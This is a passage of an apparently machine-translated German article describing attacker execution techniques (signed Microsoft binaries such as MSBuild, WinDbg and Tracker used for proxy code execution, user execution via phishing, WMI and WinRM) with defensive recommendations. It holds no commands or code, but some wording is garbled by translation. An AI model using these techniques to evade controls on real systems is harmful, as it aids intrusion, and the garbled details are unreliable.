MSBulidIst eine Softwareerstellungsplattform, die in Visual Studio verwendet wird. Es verwendet Projekte in Form von XML-Dateien, die die Anforderungen für das Erstellen verschiedener Plattformen und Konfigurationen beschreiben. Mit MSBuild aus .NET Version 4 können Sie C # -Code in ein XML-Projekt einfügen, kompilieren und dann ausführen. MSBulid.exe ist mit einem digitalen Microsoft-Zertifikat signiert.
DNX - .Net Execution Environmant (dnx.exe) ist ein Entwicklungskit für das Entwicklungskit in Visual Studio Enterprise. Gestrichen seit .NET Core CLI im Jahr 2016. DNX ist in Windows-Standardbuilds nicht verfügbar und kann nur auf Entwicklerhosts vorhanden sein, wenn .Net Core und ASP.NET Core 1.0 verwendet werden. Dnx.exe ist mit einem digitalen Zertifikat signiert und kann zur Proxy-Code-Ausführung verwendet werden.
RCSI- nicht interaktive Befehlsschnittstelle für C #, ähnlich wie bei csi.exe. Es wurde in der frühen Version der Roslyn .Net Compiler-Plattform eingeführt. Rcsi.exe ist mit einem digitalen Microsoft-Zertifikat signiert. C # .csx-Skriptdateien können mit Rcsi.exe in der Windows-Befehlszeile geschrieben und ausgeführt werden.
WinDbg / CDB ist das MS Windows-Kernel- und Benutzermodus-Debugging-Programm. Der Microsoft cdb.exe-Konsolendebugger ist auch ein Benutzermodusdebugger. Beide Dienstprogramme können als eigenständige Tools verwendet werden. Wird normalerweise in der Softwareentwicklung und im Reverse Engineering verwendet und ist in herkömmlichen Windows-Systemen nicht zu finden. Sowohl WinDbg.exe als auch CDB.exe sind mit einem digitalen Microsoft-Zertifikat signiert und können zum Codieren von Proxys verwendet werden.
Tracker- Tracking.exe-Dienstprogramm zur Dateiverfolgung. In .NET als Teil von MSBuild enthalten. Es wird verwendet, um Aufrufe im Dateisystem von Windows 10 zu registrieren. Mit tracker.exe können Angreifer DLLs in verschiedenen Prozessen ausführen. Tracker.exe ist auch mit einem Microsoft-Zertifikat signiert.

Schutzempfehlungen: Alle oben genannten Dateien sind aus dem System zu entfernen, wenn sie von den Benutzern nicht bestimmungsgemäß verwendet werden.

Benutzerausführung


System: Windows, Linux, macOS
Berechtigungen: Benutzerbeschreibung
: Angreifer können sich auf bestimmte Benutzeraktionen verlassen, um bestimmte Aktionen ausführen zu können. Dies kann eine direkte Code-Ausführung sein, wenn ein Benutzer eine schädliche ausführbare Datei öffnet, die als Phishing-Anhang mit einem Symbol und einer sichtbaren Dateierweiterung des Dokuments geliefert wird. Manchmal können auch andere Techniken verwendet werden, z. B. wenn ein Benutzer in einer Phishing-E-Mail auf einen Link klickt, wodurch die Sicherheitsanfälligkeit eines Browsers ausgenutzt wird. Die "User Executable" -Technik wird häufig in anderen Invasionsstadien verwendet, z. B. wenn ein Angreifer eine Datei in ein gemeinsames Verzeichnis oder auf den Desktop des Benutzers legt und sich darauf verlässt, dass er darauf "klickt".

Schutztipps: Erhöhen Sie die Aufmerksamkeit der Benutzer. Download-Dateien wie .scr, .exe, .pif, .cpl usw. blockieren Die Verwendung von Antivirensoftware und die Einführung von IPS-Systemen.

Windows Management Instrumentation (WMI)


System: Windows
Berechtigungen: Benutzer, Administrator
Beschreibung: WMI ist ein Windows-Administrations-Toolkit, das lokalen und Remote-Zugriff auf Windows-Systemkomponenten ermöglicht. WMI verwendet SMB und RPCS (läuft an Port 135). Angreifer können WMI verwenden, um mit lokalen und Remote-Systemen zu interagieren, und sie können auch viele taktische Operationen ausführen, z. B. das Sammeln von Informationen in der Ermittlungsphase und das ferngesteuerte Ausführen von Dateien während der „wörtlichen Bewegung“.

Schutzempfehlungen:Das Deaktivieren von WMI und RPCS kann zu Systeminstabilitäten führen. Standardmäßig können nur Administratoren über WMI eine Remote-Verbindung zum System herstellen. Verhindern Sie überlappende Rechte für administrative und andere privilegierte Konten.

Windows Remote Management (WinRM)


System: Windows
Berechtigungen: Benutzer, Administrator
Beschreibung: Windows Remote Management (WinRM) ist der Name des Dienstes und des Protokolls, mit dem der Benutzer remote mit dem System interagieren kann (z. B. Starten einer Datei, Ändern der Registrierung, Ändern des Dienstes. Verwenden Sie zum Starten den Befehl winrm und andere Programme ., wie Powershell

auf Schutz Hinweis: die WinRM deaktivieren , wenn es notwendig ist, die Infrastruktur WinRM mit separaten Konten und die Erlaubnis sollte .. sein isolieren Empfehlungen winrm Authentifizierungsmethoden und Verwendung zur Konfiguration randmauerov Host nur mit bestimmten Geräten Zugriff auf WinRM zu ermöglichen.

Jetzt auch beliebt: